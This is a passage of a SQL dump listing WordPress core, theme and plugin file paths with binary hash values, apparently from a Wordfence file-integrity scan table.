̳%�ج0','wp-content/plugins/wp-cerber/assets/flags/cn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���-V�|֬S���','j�_�\r49�>�x+E�X��H��dF���K�`','',0,'?'),('\Zd�R�\n�}���w9','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7|�z��✮','�E�(�\ru��\nP18dy��h�R�����k�q','',0,'?'),('\ZlYӣ�|D���6�p','wp-content/themes/catch-flames/images/demo/featured1-350x263.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�һ�����p���E','}cf^u�wv?)���ئҋ��g酛���`u�','',0,'?'),('\Z\Z��L�X�?T鍦','wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̦\\����l��G?','�;�}pSy���,7sa.�T��ˌO1q\'�5[��~','',0,'?'),('\Z��_eym�\Z�v��/\\','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LgD5w\'|�IGV��5','�}њ@�PF�)M���$��j���p{e','',0,'?'),('\Z�4�P>���cGtW�@','wp-content/themes/lovecraft/widgets/recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���˹_��Ѳ�u','�����~!��ڍkt�;�7\n�z���X*��\Z�','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\Z���Tc)A�Z�_[','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/rulers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OrN�O�-r@JO�V�','�\\QHs����]���Ch	\"J�`�3��*�','',0,'?'),('\ZŴԭ�xvw�E\nv','wp-content/plugins/wp-cerber/assets/flags/mk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���Zx��e��','Ŷv�ew��s��֝�wx�YԌ[@eQ�C�j','',0,'?'),('\Z�)�@��~�|Muհ�','wp-content/themes/advance/inc/kirki/assets/js/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���et���ؖ��','|]��yX�E��G�@��w!2��Ѣ�(','',0,'?'),('\Z�`��c�\"�q]��\'O6','wp-content/plugins/wordfence/js/wfi18n.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU	��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('\Z�>��XZP�r*���','wp-content/themes/newsmag/inc/admin/welcome-screen/css/welcome_customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�����a��v�','����j�\r?A��G�X��s?}�7Z�ZV','',0,'?'),('\Z��{l46-��jT99','wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��B8lc^��','5�J�9h��ALg��@�`�uw�o��3��\0I>','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.���$[L�$�۫�','sF���z ��v�j���*�	Q��w�0�ov','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+f~�Da�أv|�/�','%tK�r���t��M��b��n:�a����>E','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���閴�u)�B���1�','��v��h��d���L�V�y􅊖�^n\"�ّ\0]p�','',0,'?'),(',`a\'B��9\r','wp-content/themes/catch-flames/css/genericons/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&tw�4�Љ�pc�$','���;��=LV|,8�Tg0W�N�QA@kC@���','',0,'?'),('cQb��K���G��','wp-content/themes/auberge/library/controls/class-WM_Customizer_Hidden.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڙ	��FԴ�\nީp��Y','q*մR�-�z��Z��?�.�x�[+�u�q���','',0,'?'),('!])&�Y�cA�LI���','wp-content/themes/catch-responsive/inc/catchresponsive-custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%���U�/$��Q','���oWh\0,�5¥(䶥k�ݝ�ͨ��\Z���F_\"','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF“\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('(�řB���LZ��','wp-content/themes/Endolf/inc/paginate.php',0,'$Nb�KI�Z)��*��w','$Nb�KI�Z)��*��w','�h���?��Mq��L���i��h��]L��','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('5���hR\0��@��1','wp-content/themes/graphene/js/jquery-ui/images/ui-bg_highlight-soft_75_ffe45c_1x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�T�M��z�7�','�l$`�1Ur�ZEs ���� �_s�@�K��','',0,'?'),('Ryr�|���o>���>','wp-content/themes/twentytwentyone/assets/css/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c*�ΌƝ�+�Wi�','�W/�����%=M]ZX�>\n>.\0x�5#^��','',0,'?'),('k����7|d����T;','wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�t�J��?&B�I�_�','D*��\nS��A�w��5e�\Z��ӔM2���','',0,'?'),('��TN��H �p�]�','wp-content/themes/lovecraft/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��i��FN��j�','k��F�lh�)����C��آj�-�,�*�=��','',0,'?'),('��\Z�Zph��','wp-content/themes/catch-flames/js/fitvids.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','._�S�R/Ӧ�mR,1W6','L�9T<����2�\"ʐ�>ʢ�拮8�v�','',0,'?'),('����Eӆ�Z���{','wp-content/themes/auberge/template-parts/content-food-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����U1���W�,','���ڧtt�n��c����{��','',0,'?'),('�$�O�C&L�,)���\"','wp-content/themes/gildrest/template-parts/common/prev-next.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?yC�\naA��D�{','���V����KZ��NR\0�ۂTn�\'M����4','',0,'?'),('�\0��R�Џ�Ykb��','wp-content/themes/advance/inc/kirki/assets/js/controls/spacing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*F��xv�z����','N�Jc\"�-S	oc(�P(�d������H~;','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('�s�‹�=����\0','wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-zLܗ�G��3�|4y','e�9����x^h�Ǔ|B�1u��2t�\'�Y�\n	','',0,'?'),('��<b���!ž�','wp-content/plugins/wp-cerber/assets/flags/ge.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aw�J#ܿ�d��F','��6��o�M�X��ݕ�D���֖M�+','',0,'?'),('²�d�\Z��|P!8��','wp-content/themes/catch-flames/content-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��RD.\Zd�T��Ш�C','�CIԡ�<��\"�]	��(�#7��1w<@{ǽ','',0,'?'),('Dz���Kb�d\0G�7��','wp-content/themes/skt-pathway/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĥa@�m��8���u','�� nr��O*Xc�\n�N���吩�X����','',0,'?'),('�a���=	Cة�\'�','wp-content/themes/skt-pathway/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��8�Ki�^��i�','��0\"{�N��.��3�z�?EV�C��	��','',0,'?'),('ɍ���Z8�y$��&�#','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/paraiso-light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��sG�yR����','�[��3@x��VX2e�z�8������Q','',0,'?'),('�d��I\Z�S�~8Nk�','wp-content/themes/chronus/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k���4���8�)','qҿ���n�򜓭\0\"\r�\"&\'�|���\Zt���','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('��;��k�,P�x�','wp-content/themes/monograph/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�=³zeX*�|��b','Ä@��Pw*\'�0M�\'D�۝c�1��ח�d��','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�0.���f��','C�X�R�\Z��)GU+LA�� �$�:�1�e�','',0,'?'),('�~��e���#A��`','wp-content/themes/authorize/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^c���z԰���i','�ֵg���HcX��+xgՔBP9D���0�de','',0,'?'),('H�/�F�.}��⣣�','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�Kf�<tv޽{�E','K�TA�ԢF�%\0W�E�7��8�\r�;=��','',0,'?'),(' �u�R��@��WW��','wp-content/themes/newsmag/assets/sass/navigation/_socials.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�#6�����Z��','\Z���z��Y(�u���g�}��]���7��/','',0,'?'),('!�OYa��3�\r','wp-content/themes/city-store/inc/settings/city-store-tgmp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-;���fj�����','��f�d�|�r˺fKI�Q���p�?^W�8��<','',0,'?'),('#��Υ���<\":��2','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;1�4�7� >!s\0.','�{p��۹�\0�YںC8h3$�~z�d����','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('.㒛��\Z���k0��','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����G�Q�',',®�%�4&ʐw�l�1(9g�c�����s','',0,'?'),('08;*��O���)�','wp-content/themes/university-hub/inc/hook/structure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�1�*CAh��8K��','�q���;*�7�����SS���E�\Z%K�c.��','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\0�]������	�-','�{&B>�:]�\n��a��m����c�[zk!�','',0,'?'),('<B��ʱ�A51ӱ','wp-content/plugins/akismet/_inc/form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�4�l*��&��i','�MB�1�QwoX4bx��c)@D�˥��k','',0,'?'),('B;|��1*�e','wp-content/themes/catch-responsive/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hU�a�7��V�0	V','\n(#��L#����<�J��|�T���h','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xc�T��#�Δ�(�','�Pi<l��D%�J{d�w�������5/','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�o��\Z�����#','r�����a����D����*�Q�R��4A�','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('Y ����S��z�X^','wp-content/plugins/wp-cerber/assets/flags/bj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��̂(,�ߨP}r��','�`	�U�Y�ģ���Ç�/�5��T��\"5','',0,'?'),('Y���\0�z�FΎܘ�','wp-content/themes/edge/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�K����x��jN','q� ���?D�\'K��,z��D�V�U��![ܠ','',0,'?'),('Z	�2?+\'���-��','wp-content/themes/university-hub/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��p�On�z�c*k>5)','�u���*�g���VY�Z����\nM&�B`+�K','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('b�0�����~�/','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Әȵ �_8�Q3��','�u3{#\'r=MY,��k��ڎ\0��R�tY��','',0,'?'),('bW�xC�ɿ\'���','wp-content/themes/city-store/inc/customizer/functions/register-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�9��3�H�:�+n��','��b\Z�ě�[�9|�gC�<Z��^}�Y p�l�a','',0,'?'),('mڀG��^g�OS1��','wp-content/themes/enigma/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�#�W��t�','��k�c��gD������:�]��^�','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l2�Ǘ�yf[CZ߈G','H׶�mb�(���f�>MX��=�W��|��ٿx','',0,'?'),('�x�hs^dƐ�%','wp-content/themes/newsmag/inc/widgets/popularposts/class-widget-newsmag-popularposts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D)�G��A��;�','q�q�x�>p1-V�G]����~��k2��','',0,'?'),('��\rC�jg�Y�or','wp-content/themes/brickyard/css/blue.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߿,3?g��\"h5w>�','����f�\"�h��0`�_��\05_�t��D��M','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R]	l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),('�\"q���(���͏Uou','wp-content/themes/skt-pathway/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�ï\"I��\n���','�o�\0Cj���\ZM�;2�D���\r�2	����','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('�����>����p�\rB','wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�N#vk�s��z','w;�[f�]X��Þ&�����y2,����F','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����̀)#\rS� ��','�q#�.Z!�g�l���讍T�\0�u�\'EA�?�','',0,'?'),('��B���5gj4S��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/runmode/colorize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=T�k$n���nu','␣���W�	f�a�������\\�j���','',0,'?'),('ŒӲ5���ؑ�;�','wp-content/themes/wp-simple/assets/images/preview/jelly.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���?G���ݟ��O�O','*$[2���H�|�z��F@�\"�i��3','',0,'?'),('��º��\06�R&q','wp-content/plugins/wp-cerber/assets/flags/lc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?x2\Zˁ%��*�','��dV��d����5�w$�E�,Ư�{l','',0,'?'),('�n��(�}g��V뇔','wp-content/themes/event/inc/customizer/event-default-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ę���F���?��F�','�g�!� �R����:�J�0�nd���{�;Vs�B','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY	�o��\r����','',0,'?'),('�5��W\Z�M���','wp-content/themes/wp-simple/assets/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�U�hcr�Ԫ����&','��7�w�b*֕f��\r�r�1Jk��׫ad�','',0,'?'),('�3؁�]A�R�klU.','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_bordered-pulled.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�\r�{�\'��3��lk�','���8�؅2�.�1��4$�rTo��U�W�	��','',0,'?'),('����^�cm]�s~','wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ced]@�>�t�Ɇ��','JSu�j�F#�e��҇p�U�a�;�S�','',0,'?'),('�\r)�51T�� ��o','wp-content/themes/twentytwentyone/inc/block-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t@/�ߢ�@e��R','��r�4����w�����zZ�Z�S$�','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ϱ݂I','����Ȗ�riP]�o���+�g֯�*?=P','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('�.+�z�OO��%j8g','wp-content/themes/advance/inc/kirki/includes/class-kirki-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�m8	�R�Dj���,','\"�+�v1�;�<���M_G���;=tD�%i`$','',0,'?'),('���I�p5h]��*','wp-content/themes/graduate/assets/plugins/js/unminified/jquery.sidr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2IT\'�L�SvDH�	��','�,�y�]�D��@[p��]��E�L��4bS','',0,'?'),('�CN#��ĔB����','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��•\0���\Z����O','��K�!�l�̞�<�w�G	�x6����A\0fj','',0,'?'),('{���%ϸ�u�\\�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/select.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�-k���F�ѝ�','˄ ��,���A�Ć\0?�l�س��&�C4�','',0,'?'),('0� \'i�DZ&L%�','wp-content/themes/event/js/source/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����#+t\r�zA','C��@�|g������8r���>�;Ò��+(t��8','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('٩�\'~��mat�t','wp-content/themes/hitmag/js/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�L�\n�r�)�L','o9J�B�{2[�Je\r����@q��ؘ�Դ�lD�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����n	�VQ�H��','Y��^�Up���yx.ΕP��\0���\Z�����','',0,'?'),('{&��� ���','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/xml/xml.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ׄ�TVJc/G�Vj��','V�����q�ZSV˞�G��oPJ�X��Zm3D8','',0,'?'),('26��{�m�K� ׿','wp-content/themes/advance/images/ico-delete.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hF�|�Ưxdg_+','~qz4���E��=��G<����c yA���UG�','',0,'?'),('2J0���xYr���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Q[릶������','�)�t1��@�1\0��ו����KW���\0���','',0,'?'),('9S(��\Z�p+`Fi�m','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/base16-light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��K\0����n\Z�*�z','#�.*ȩK,�\r�D��<����\\���:�{�-�','',0,'?'),('@[�8`hk4����h','wp-content/themes/auberge/assets/css/welcome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NS#�1^ʄ��','�G�ݺ�Ya��:���&�w�W�`eXj5��','',0,'?'),('Kg\Z�P�F\\�,�f','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),(']���(�7�^����U','wp-content/plugins/wp-cerber/assets/flags/zw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^�~����E,Tl','S��Y�2�r�5��S�a�J�\"��tJ�@ArC�','',0,'?'),('^C����N�(�\n�','wp-content/themes/chronus/template-parts/widgets/magazine-large-post-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�9ǺG<\n�o�S$�','����7�i�\n�l�d��5\0��QR68�����','',0,'?'),('b޹��\n�r��\\,+','wp-content/themes/advance/inc/widgets/ourclient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sY\\��L����^ p','+���z)J)�%_n���e�/-��%Tr��','',0,'?'),('fMx���	�+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��›|���\Ze�+J~','��h��v�ԲF:�Zؿ�Bd`����Y���','',0,'?'),('m���F뾚}�W�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/edit/closetag.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^(�5���:���','AC�QS),�������\Z[��nڪ�t��VE�','',0,'?'),('��a�x� ����g�','wp-content/themes/auberge/template-parts/content-custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#���|�>�<����','�Yk{H���r��\Z�ٷ�͓ӗ�^�c���','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('����J�}F��E\0�9�','wp-content/themes/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�~;{�.Q�5�2��','wp-content/themes/hemingway/template-nosidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}<�;�p\"VM-ׄ,','��>���#kgT<al��3�����Ґ��>�`��=','',0,'?'),('���`�	�\0K��,�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/lint/lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E���CLb_Y�NE','���ӟ5�}�i��L���R���$�.�h2�B�','',0,'?'),('���ܻ�?T���l�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���sݘ\Z�4Ѫ�','\'Y��t�\0�{T�bsMo�ј��|����','',0,'?'),('���/N��6pLY�&D','wp-content/themes/hitmag/inc/kirki/includes/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԟ��\r`�n$\Z��~�','�P���x��D\'�6��Ǵ\\�?�E���S7vw','',0,'?'),('�A��e帗�U�q8','wp-content/themes/the-best/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�v�\';�ž~C�,E�','(R�$(��h;{L���	�X��U�Z\r͙�','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ef�1!9vC8�:(��\'','Uc�OТ��0;�[�z\'��أdP��+�j���0','',0,'?'),('��ܛCzP��9�x�','wp-content/themes/wp-simple/parts/content-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���+A��6�F�4q��','�J��	�W�8��C\'�����Ջ�,���=x','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YYw_s簃@	D